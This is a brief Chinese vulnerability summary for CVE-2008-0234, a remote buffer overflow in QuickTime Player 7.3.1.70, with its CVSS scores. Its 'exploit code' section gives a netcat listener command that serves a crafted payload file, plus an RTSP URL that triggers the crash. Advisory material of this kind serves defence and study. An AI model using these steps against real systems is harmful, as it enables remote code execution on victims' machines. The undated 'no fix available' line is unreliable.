漏洞关键信息 漏洞信息 漏洞名称: Buffer-overflow in Quicktime Player 7.3.1.70 CVE编号: CVE-2008-0234 CWE编号: CWE-119 CVSS评分: - 基本评分: 9.3/10 - 影响子评分: 10/10 - 利用子评分: 8.6/10 风险级别: 高 漏洞细节 应用程序: Quicktime Player 受影响的版本: <= 7.3.1.70 平台: Windows 和 Mac 漏洞类型: 缓冲区溢出 利用方式: 远程 发现日期: 2008年1月10日 发现者: Luigi Auriemma 漏洞描述 利用代码 nc -l -p 80 -v -v -n < quicktimebof.txt rtsp://127.0.0.1/file.mp3 修复建议 当前无修复方案。